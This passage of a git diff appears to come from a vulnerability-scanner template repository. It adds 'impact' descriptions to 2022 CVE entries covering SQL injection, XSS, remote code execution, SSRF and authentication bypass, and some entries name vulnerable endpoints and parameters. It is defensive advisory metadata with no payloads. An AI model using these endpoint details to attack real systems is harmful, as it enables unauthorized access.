@@ -6,6 +6,8 @@ info: severity: high description: | Oracle E-Business Suite (component: Manage Proxies) 12.1 and 12.2 are susceptible to an easily exploitable vulnerability that allows an unauthenticated attacker with network access via HTTP to compromise it by self-registering for an account. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle E-Business Suite accessible data. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the Oracle E-Business Suite application. remediation: | Apply the necessary security patches or updates provided by Oracle to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-21661.yaml b/http/cves/2022/CVE-2022-21661.yaml index 45a84021e3..b274bde076 100644 --- a/http/cves/2022/CVE-2022-21661.yaml +++ b/http/cves/2022/CVE-2022-21661.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress before 5.8.3 is susceptible to SQL injection through multiple plugins or themes due to improper sanitization in WP_Query, An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: This has been patched in 5.8.3. Older affected versions are also fixed via security release, that go back till 3.7.37. We strongly recommend that you keep auto-updates enabled. There are no known workarounds for this vulnerability. reference: - https://wpscan.com/vulnerability/7f768bcf-ed33-4b22-b432-d1e7f95c1317 diff --git a/http/cves/2022/CVE-2022-21705.yaml b/http/cves/2022/CVE-2022-21705.yaml index 048c69ae56..1f22a361db 100644 --- a/http/cves/2022/CVE-2022-21705.yaml 
+++ b/http/cves/2022/CVE-2022-21705.yaml @@ -6,6 +6,8 @@ info: severity: high description: | October CMS is susceptible to remote code execution. In affected versions, user input is not properly sanitized before rendering. An authenticated user with the permissions to create, modify, and delete website pages can bypass cms.safe_mode and cms.enableSafeMode in order to execute arbitrary code. This affects admin panels that rely on safe mode and restricted permissions. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | The issue has been patched in Build 474 (1.0.474) and 1.1.10. Users unable to upgrade should apply https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe manually to installation. reference: diff --git a/http/cves/2022/CVE-2022-2185.yaml b/http/cves/2022/CVE-2022-2185.yaml index db5670c3c9..3047386430 100644 --- a/http/cves/2022/CVE-2022-2185.yaml +++ b/http/cves/2022/CVE-2022-2185.yaml @@ -5,6 +5,8 @@ info: author: GitLab Red Team severity: high description: GitLab CE/EE 14.0 prior to 14.10.5, 15.0 prior to 15.0.4, and 15.1 prior to 15.1.1 is susceptible to remote code execution. An authenticated user authorized to import projects can import a maliciously crafted project, thus possibly being able to execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches provided by GitLab to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-2187.yaml b/http/cves/2022/CVE-2022-2187.yaml index 4e916d3801..00ae631428 100644 --- a/http/cves/2022/CVE-2022-2187.yaml +++ b/http/cves/2022/CVE-2022-2187.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Contact Form 7 Captcha plugin before 0.1.2 contains a reflected cross-site scripting vulnerability. It does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update the WordPress Contact Form 7 Captcha plugin to version 0.1.2 or later to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-2219.yaml b/http/cves/2022/CVE-2022-2219.yaml index 8e57244cbe..94316e0ff9 100644 --- a/http/cves/2022/CVE-2022-2219.yaml +++ b/http/cves/2022/CVE-2022-2219.yaml @@ -6,6 +6,8 @@ info: severity: high description: | The plugin does not sanitise and escape the QUERY_STRING before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting in browsers which do not encode characters + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data theft, and potential compromise of the affected website. remediation: Fixed in version 2.7.27 reference: - https://wpscan.com/vulnerability/1240797c-7f45-4c36-83f0-501c544ce76a diff --git a/http/cves/2022/CVE-2022-22242.yaml b/http/cves/2022/CVE-2022-22242.yaml index 17579eeb58..9fdc083ba0 100644 --- a/http/cves/2022/CVE-2022-22242.yaml +++ b/http/cves/2022/CVE-2022-22242.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Juniper Web Device Manager (J-Web) in Junos OS contains a cross-site scripting vulnerability. This can allow an unauthenticated attacker to run malicious scripts reflected off J-Web to the victim's browser in the context of their session within J-Web, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue affects all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2; 22.1 versions prior to 22.1R2. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by Juniper Networks to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-22536.yaml b/http/cves/2022/CVE-2022-22536.yaml index 53a4145fb1..47717fd6ff 100644 --- a/http/cves/2022/CVE-2022-22536.yaml +++ b/http/cves/2022/CVE-2022-22536.yaml 
@@ -5,6 +5,8 @@ info: author: pdteam severity: critical description: SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to request smuggling and request concatenation attacks. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system. + impact: | + Successful exploitation of this vulnerability can result in unauthorized access to sensitive data and potential data leakage. remediation: | Apply the latest security patches and updates provided by SAP to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-22733.yaml b/http/cves/2022/CVE-2022-22733.yaml index a9015b5aaf..1e9bcfd5a3 100644 --- a/http/cves/2022/CVE-2022-22733.yaml +++ b/http/cves/2022/CVE-2022-22733.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache ShardingSphere ElasticJob-UI allows an attacker who has guest account to do privilege escalation. This issue affects Apache ShardingSphere ElasticJob-UI Apache ShardingSphere ElasticJob-UI 3.x version 3.0.0 and prior versions. + impact: | + Successful exploitation of this vulnerability could result in unauthorized access and control of the ElasticJob-UI application. remediation: | Apply the latest security patches or updates provided by Apache ShardingSphere to mitigate the privilege escalation vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-22897.yaml b/http/cves/2022/CVE-2022-22897.yaml index d2212c7c05..ec7688cb07 100644 --- a/http/cves/2022/CVE-2022-22897.yaml +++ b/http/cves/2022/CVE-2022-22897.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | A SQL injection vulnerability in the product_all_one_img and image_product parameters of the ApolloTheme AP PageBuilder component through 2.4.4 for PrestaShop allows unauthenticated attackers to exfiltrate database data. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. remediation: | Upgrade PrestaShop Ap Pagebuilder to version 2.4.5 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-2290.yaml b/http/cves/2022/CVE-2022-2290.yaml index f29466e7d7..77826c261a 100644 --- a/http/cves/2022/CVE-2022-2290.yaml +++ b/http/cves/2022/CVE-2022-2290.yaml @@ -5,6 +5,8 @@ info: author: dbrwsky severity: medium description: Trilium prior to 0.52.4, 0.53.1-beta contains a cross-site scripting vulnerability which can allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected Trilium instance. remediation: | Upgrade Trilium to version 0.52.4 or later, which includes proper input sanitization to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-22947.yaml b/http/cves/2022/CVE-2022-22947.yaml index cbb5a88115..be109ca149 100644 --- a/http/cves/2022/CVE-2022-22947.yaml +++ b/http/cves/2022/CVE-2022-22947.yaml 
@@ -5,6 +5,8 @@ info: author: pdteam severity: critical description: Applications using Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host. + impact: | + Successful exploitation of this vulnerability could lead to remote code execution, compromising the confidentiality, integrity, and availability of the affected system. remediation: | Apply the latest security patches provided by the vendor and ensure proper input validation to prevent code injection attacks. reference: diff --git a/http/cves/2022/CVE-2022-22954.yaml b/http/cves/2022/CVE-2022-22954.yaml index c4e8f54676..9e34745ef6 100644 --- a/http/cves/2022/CVE-2022-22954.yaml +++ b/http/cves/2022/CVE-2022-22954.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | VMware Workspace ONE Access is susceptible to a remote code execution vulnerability due to a server-side template injection flaw. An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager. + impact: | + Successful exploitation of this vulnerability could lead to remote code execution, compromising the confidentiality, integrity, and availability of the affected system. remediation: | Apply the latest security patches provided by VMware to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-22963.yaml b/http/cves/2022/CVE-2022-22963.yaml index 1d438a0a73..56b0989602 100644 --- a/http/cves/2022/CVE-2022-22963.yaml +++ b/http/cves/2022/CVE-2022-22963.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions are susceptible to remote code execution vulnerabilities. When using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches provided by the Spring Cloud project to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-22965.yaml b/http/cves/2022/CVE-2022-22965.yaml index f3774b4f4c..06b0f81ea4 100644 --- a/http/cves/2022/CVE-2022-22965.yaml +++ b/http/cves/2022/CVE-2022-22965.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Spring MVC and Spring WebFlux applications running on Java Development Kit 9+ are susceptible to remote code execution via data binding. It requires the application to run on Tomcat as a WAR deployment. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to this exploit. reference: - https://tanzu.vmware.com/security/cve-2022-22965 diff --git a/http/cves/2022/CVE-2022-22972.yaml b/http/cves/2022/CVE-2022-22972.yaml index cfa3852e40..e34c8b51da 100644 --- a/http/cves/2022/CVE-2022-22972.yaml +++ b/http/cves/2022/CVE-2022-22972.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the affected system. remediation: | Apply the latest security patches or updates provided by VMware to fix the authentication bypass vulnerability (CVE-2022-22972). reference: diff --git a/http/cves/2022/CVE-2022-23102.yaml b/http/cves/2022/CVE-2022-23102.yaml index 4692313914..98acdc07e4 100644 --- a/http/cves/2022/CVE-2022-23102.yaml +++ b/http/cves/2022/CVE-2022-23102.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A vulnerability has been identified in SINEMA Remote Connect Server (All versions < V2.0). Affected products contain an open redirect vulnerability. An attacker could trick a valid authenticated user to the device into clicking a malicious link there by leading to phishing attacks. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks. remediation: | Upgrade to SINEMA Remote Connect Server version 2.0 or later to fix the open redirect vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-23131.yaml b/http/cves/2022/CVE-2022-23131.yaml index eaf7c2822e..96692e0ebd 100644 --- a/http/cves/2022/CVE-2022-23131.yaml +++ b/http/cves/2022/CVE-2022-23131.yaml 
@@ -5,6 +5,8 @@ info: author: For3stCo1d,spac3wh1te severity: critical description: When SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor because a user login stored in the session was not verified. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Zabbix monitoring system. remediation: Upgrade to 5.4.9rc2, 6.0.0beta1, 6.0 (plan) or higher. reference: - https://support.zabbix.com/browse/ZBX-20350 diff --git a/http/cves/2022/CVE-2022-23134.yaml b/http/cves/2022/CVE-2022-23134.yaml index 402f8807cb..a187519943 100644 --- a/http/cves/2022/CVE-2022-23134.yaml +++ b/http/cves/2022/CVE-2022-23134.yaml @@ -5,6 +5,8 @@ info: author: bananabr severity: medium description: After the initial setup process, some steps of setup.php file are reachable not only by super-administrators but also by unauthenticated users. A malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Zabbix setup configuration. remediation: | Apply the latest security patches or updates provided by Zabbix to fix the authentication bypass vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-2314.yaml b/http/cves/2022/CVE-2022-2314.yaml index 296bcc3d26..e67e3c6492 100644 --- a/http/cves/2022/CVE-2022-2314.yaml +++ b/http/cves/2022/CVE-2022-2314.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | WordPress VR Calendar plugin through 2.3.2 is susceptible to remote code execution. The plugin allows any user to execute arbitrary PHP functions on the site. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site. remediation: | Update the WordPress VR Calendar plugin to version 2.3.3 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-23178.yaml b/http/cves/2022/CVE-2022-23178.yaml index b196ae35df..9520196922 100644 --- a/http/cves/2022/CVE-2022-23178.yaml +++ b/http/cves/2022/CVE-2022-23178.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: An issue was discovered on Crestron HD-MD4X2-4K-E 1.0.0.2159 devices. When the administrative web interface of the HDMI switcher is accessed unauthenticated, user credentials are disclosed that are valid to authenticate to the web interface. Specifically, aj.html sends a JSON document with uname and upassword fields. + impact: | + An attacker can obtain sensitive credentials, leading to unauthorized access and potential compromise of the device. remediation: | Update the Crestron Device firmware to the latest version to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-23347.yaml b/http/cves/2022/CVE-2022-23347.yaml index 83cdd176d5..43282776dc 100644 --- a/http/cves/2022/CVE-2022-23347.yaml +++ b/http/cves/2022/CVE-2022-23347.yaml 
@@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: BigAnt Server v5.6.06 is vulnerable to local file inclusion. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the server. remediation: | Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in BigAnt Server v5.6.06. reference: diff --git a/http/cves/2022/CVE-2022-23544.yaml b/http/cves/2022/CVE-2022-23544.yaml index 1709e05715..5a9e5d055c 100644 --- a/http/cves/2022/CVE-2022-23544.yaml +++ b/http/cves/2022/CVE-2022-23544.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | MeterSphere is a one-stop open source continuous testing platform, covering test management, interface testing, UI testing and performance testing. Versions prior to 2.5.0 are subject to a Server-Side Request Forgery that leads to Cross-Site Scripting. A Server-Side request forgery in `IssueProxyResourceService::getMdImageByUrl` allows an attacker to access internal resources, as well as executing JavaScript code in the context of Metersphere's origin by a victim of a reflected XSS. This vulnerability has been fixed in v2.5.0. There are no known workarounds. + impact: | + An attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access or information disclosure. remediation: | Upgrade MeterSphere to version 2.5.0 or later to mitigate the SSRF vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-2373.yaml b/http/cves/2022/CVE-2022-2373.yaml index cae9b857de..fe1c70c948 100644 --- a/http/cves/2022/CVE-2022-2373.yaml +++ b/http/cves/2022/CVE-2022-2373.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Simply Schedule Appointments plugin before 1.5.7.7 is susceptible to information disclosure. The plugin is missing authorization in a REST endpoint, which can allow an attacker to retrieve user details such as name and email address. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the target system. remediation: | Update to the latest version of the Simply Schedule Appointments plugin (1.5.7.7 or higher) to fix the information disclosure vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-2376.yaml b/http/cves/2022/CVE-2022-2376.yaml index 95afd1f267..c2dad18210 100644 --- a/http/cves/2022/CVE-2022-2376.yaml +++ b/http/cves/2022/CVE-2022-2376.yaml @@ -5,6 +5,8 @@ info: author: Random-Robbie severity: medium description: WordPress Directorist plugin before 7.3.1 is susceptible to information disclosure. The plugin discloses the email address of all users in an AJAX action available to both unauthenticated and authenticated users. + impact: | + An attacker can gain sensitive information about the WordPress installation, potentially leading to further attacks. remediation: Fixed in version 7.3.1. reference: - https://wpscan.com/vulnerability/437c4330-376a-4392-86c6-c4c7ed9583ad diff --git a/http/cves/2022/CVE-2022-23779.yaml b/http/cves/2022/CVE-2022-23779.yaml index c3f6073e16..19deca757f 100644 --- a/http/cves/2022/CVE-2022-23779.yaml +++ b/http/cves/2022/CVE-2022-23779.yaml 
@@ -5,6 +5,8 @@ info: author: cckuailong severity: medium description: Zoho ManageEngine Desktop Central before 10.1.2137.8 exposes the installed server name to anyone. The internal hostname can be discovered by reading HTTP redirect responses. + impact: | + An attacker could use the disclosed internal hostnames to plan targeted attacks, gain unauthorized access, or perform reconnaissance on the internal network. remediation: | Apply the latest security patch or update provided by Zoho ManageEngine to fix the internal hostname disclosure vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-2379.yaml b/http/cves/2022/CVE-2022-2379.yaml index b39a068ea8..fead6aae7d 100644 --- a/http/cves/2022/CVE-2022-2379.yaml +++ b/http/cves/2022/CVE-2022-2379.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Easy Student Results plugin through 2.2.8 is susceptible to information disclosure. The plugin lacks authorization in its REST API, which can allow an attacker to retrieve sensitive information related to courses, exams, and departments, as well as student grades and information such as email address, physical address, and phone number. + impact: | + An attacker can gain access to sensitive student information, potentially compromising their privacy and security. remediation: | Update to the latest version of the WordPress Easy Student Results plugin (2.2.8) to fix the improper authorization vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-23808.yaml b/http/cves/2022/CVE-2022-23808.yaml index 808bd3a1a3..d48b87eb10 100644 --- a/http/cves/2022/CVE-2022-23808.yaml +++ b/http/cves/2022/CVE-2022-23808.yaml 
@@ -5,6 +5,8 @@ info: author: cckuailong,daffainfo severity: medium description: An issue was discovered in phpMyAdmin 5.1 before 5.1.2 that could allow an attacker to inject malicious code into aspects of the setup script, which can allow cross-site or HTML injection. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the targeted user's browser, potentially leading to session hijacking, data theft, or other malicious activities. remediation: | Upgrade phpMyAdmin to version 5.1.2 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-2383.yaml b/http/cves/2022/CVE-2022-2383.yaml index fe241269dd..b67ba74447 100644 --- a/http/cves/2022/CVE-2022-2383.yaml +++ b/http/cves/2022/CVE-2022-2383.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Feed Them Social plugin before 3.0.1 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back in the page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update to the latest version of the Feed Them Social plugin (3.0.1 or higher) to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-23854.yaml b/http/cves/2022/CVE-2022-23854.yaml index b65c68a673..684d5adb7b 100644 --- a/http/cves/2022/CVE-2022-23854.yaml +++ b/http/cves/2022/CVE-2022-23854.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | AVEVA InTouch Access Anywhere Secure Gateway is vulnerable to local file inclusion. + impact: | + An attacker can access sensitive information stored on the server, potentially leading to further exploitation or unauthorized access. remediation: | Apply the latest security patches or updates provided by AVEVA to fix the local file inclusion vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-23881.yaml b/http/cves/2022/CVE-2022-23881.yaml index 32f58f778b..48b6ebe343 100644 --- a/http/cves/2022/CVE-2022-23881.yaml +++ b/http/cves/2022/CVE-2022-23881.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: ZZZCMS zzzphp v2.1.0 is susceptible to a remote command execution vulnerability via danger_key() at zzz_template.php. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patch or upgrade to a patched version of ZZZCMS zzzphp. reference: diff --git a/http/cves/2022/CVE-2022-23898.yaml b/http/cves/2022/CVE-2022-23898.yaml index 0b6a1d6af4..ab735c999f 100644 --- a/http/cves/2022/CVE-2022-23898.yaml +++ b/http/cves/2022/CVE-2022-23898.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | MCMS 5.2.5 contains a SQL injection vulnerability via the categoryId parameter in the file IContentDao.xml. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in MCMS 5.2.5. reference: 
diff --git a/http/cves/2022/CVE-2022-23944.yaml b/http/cves/2022/CVE-2022-23944.yaml index 0cc39f59aa..4dac52a759 100644 --- a/http/cves/2022/CVE-2022-23944.yaml +++ b/http/cves/2022/CVE-2022-23944.yaml @@ -5,6 +5,8 @@ info: author: cckuakilong severity: critical description: Apache ShenYu suffers from an unauthorized access vulnerability where a user can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Apache ShenYu admin panel. remediation: Upgrade to Apache ShenYu (incubating) 2.4.2 or apply the appropriate patch. reference: - https://github.com/apache/incubator-shenyu/pull/2462 diff --git a/http/cves/2022/CVE-2022-24112.yaml b/http/cves/2022/CVE-2022-24112.yaml index 9ff9a9f865..e3a1b3d7e1 100644 --- a/http/cves/2022/CVE-2022-24112.yaml +++ b/http/cves/2022/CVE-2022-24112.yaml 
@@ -5,6 +5,8 @@ info: author: Mr-xn severity: critical description: A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: Upgrade to 2.10.4 or 2.12.1. Or, explicitly configure the enabled plugins in `conf/config.yaml` and ensure `batch-requests` is disabled. (Or just comment out `batch-requests` in `conf/config-default.yaml`). reference: - https://www.openwall.com/lists/oss-security/2022/02/11/3 diff --git a/http/cves/2022/CVE-2022-24124.yaml b/http/cves/2022/CVE-2022-24124.yaml index 8e8b600d83..94c3498398 100644 --- a/http/cves/2022/CVE-2022-24124.yaml +++ b/http/cves/2022/CVE-2022-24124.yaml @@ -5,6 +5,8 @@ info: author: cckuailong severity: high description: Casdoor version 1.13.0 suffers from a remote unauthenticated SQL injection vulnerability via the query API in Casdoor before 1.13.1 related to the field and value parameters, as demonstrated by api/get-organizations. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. remediation: | Upgrade to a patched version of Casdoor or apply the necessary security patches to mitigate the SQL injection vulnerability. reference: 
diff --git a/http/cves/2022/CVE-2022-24129.yaml b/http/cves/2022/CVE-2022-24129.yaml index 1cb0fc4801..d02475f0c8 100644 --- a/http/cves/2022/CVE-2022-24129.yaml +++ b/http/cves/2022/CVE-2022-24129.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: The Shibboleth Identity Provider OIDC OP plugin before 3.0.4 is vulnerable to server-side request forgery (SSRF) due to insufficient restriction of the request_uri parameter, which allows attackers to interact with arbitrary third-party HTTP services. + impact: | + An attacker can exploit this vulnerability to send crafted requests, potentially leading to unauthorized access to internal resources or information disclosure. remediation: | Upgrade to Shibboleth OIDC OP version 3.0.4 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-2414.yaml b/http/cves/2022/CVE-2022-2414.yaml index 3076575232..ec121c2d9a 100644 --- a/http/cves/2022/CVE-2022-2414.yaml +++ b/http/cves/2022/CVE-2022-2414.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Access to external entities when parsing XML documents can lead to XML external entity (XXE) attacks. This flaw allows a remote attacker to potentially retrieve the content of arbitrary files by sending specially crafted HTTP requests. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information stored on the server. remediation: | Apply the latest security patches and updates provided by the vendor to fix the XML Entity Injection vulnerability in FreeIPA. reference: diff --git a/http/cves/2022/CVE-2022-24181.yaml b/http/cves/2022/CVE-2022-24181.yaml index 6f5a3c0647..b9b787b50b 100644 --- a/http/cves/2022/CVE-2022-24181.yaml +++ b/http/cves/2022/CVE-2022-24181.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | PKP Open Journal Systems 2.4.8 to 3.3 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary code via the X-Forwarded-Host Header. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to a patched version of PKP Open Journal Systems (OJS) or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2022/CVE-2022-24223.yaml b/http/cves/2022/CVE-2022-24223.yaml index 829db2e4bf..228dccfea9 100644 --- a/http/cves/2022/CVE-2022-24223.yaml +++ b/http/cves/2022/CVE-2022-24223.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | AtomCMS v2.0 was discovered to contain a SQL injection vulnerability via /admin/login.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: Fixed in version Atom CMS v2.1 reference: - https://packetstormsecurity.com/files/165922/Atom-CMS-2.0-SQL-Injection.html diff --git a/http/cves/2022/CVE-2022-24260.yaml b/http/cves/2022/CVE-2022-24260.yaml index 9d735a922c..fe8e0e2f2d 100644 --- a/http/cves/2022/CVE-2022-24260.yaml +++ b/http/cves/2022/CVE-2022-24260.yaml 
@@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. remediation: | Apply the latest security patches or updates provided by the vendor to fix the SQL injection vulnerability in the VoipMonitor application. reference: diff --git a/http/cves/2022/CVE-2022-24264.yaml b/http/cves/2022/CVE-2022-24264.yaml index 15a54ebdee..7c0f9a9640 100644 --- a/http/cves/2022/CVE-2022-24264.yaml +++ b/http/cves/2022/CVE-2022-24264.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the search_word parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire CMS system. remediation: | Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-24265.yaml b/http/cves/2022/CVE-2022-24265.yaml index 6346c2428a..a42c1c54d8 100644 --- a/http/cves/2022/CVE-2022-24265.yaml +++ b/http/cves/2022/CVE-2022-24265.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/menu/ via the path=component/menu/&menu_filter=3 parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire CMS system. remediation: | Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability. reference: 
